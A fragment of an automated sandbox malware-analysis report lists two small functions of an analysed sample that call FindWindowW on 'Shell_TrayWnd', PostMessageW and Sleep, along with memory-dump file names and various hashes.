                            • Instruction ID: 23342087313c1ada17c3d8f814c8c38ff6f75fe12c1fe863a0a7cf2f97d30d6a
                            • Opcode Fuzzy Hash: 30facede1f56295a861aefd90ab5419ffd2f1f6240b6072025a4b0f50fdeed91
                            • Instruction Fuzzy Hash: 7EF0C9B480110ADFDB15EB91CD84AECBBF8BB18301F540499E142A21A0D7B58F8ADF70
                            Function 00DC5998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                            Download Yara Rule
                            APIs
                            • FindWindowW.USER32 ref: 00DC59AE
                            • PostMessageW.USER32 ref: 00DC59B5
                              • Part of subcall function 00DA5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00DA52BC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: FindMessagePostSleepWindow
                            • String ID: Shell_TrayWnd
                            • API String ID: 529655941-2988720461
                            • Opcode ID: dcd593ba250fd7121d9684ea4f5153dabaac6de44334353bde041bd16fac696a
                            • Instruction ID: a2104141f88a8b6f2d6918ea4229db609a91f202a267982b7dd9c6cf022e670c
                            • Opcode Fuzzy Hash: dcd593ba250fd7121d9684ea4f5153dabaac6de44334353bde041bd16fac696a
                            • Instruction Fuzzy Hash: 72D0C9313C07127BE664AB70AC0BFD66625AB05B51F010825B346EA2D0C9E4A800C678
                            Function 00DC5964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                            Download Yara Rule
                            APIs
                            • FindWindowW.USER32 ref: 00DC596E
                            • PostMessageW.USER32 ref: 00DC5981
                              • Part of subcall function 00DA5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00DA52BC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: FindMessagePostSleepWindow
                            • String ID: Shell_TrayWnd
                            • API String ID: 529655941-2988720461
                            • Opcode ID: cbac1858062ed0231ded199e4fe4d44f3d94056c30fab0108a03a3a4bff9a352
                            • Instruction ID: d56a3996331d41dd80193cd98b93fb129914b3cc8a83620ce9e57b6342c8c080
                            • Opcode Fuzzy Hash: cbac1858062ed0231ded199e4fe4d44f3d94056c30fab0108a03a3a4bff9a352
                            • Instruction Fuzzy Hash: 64D0C931394712BBE664AB70AC0BFE66A25AB01B51F010825B34AEA2D0C9E49800C674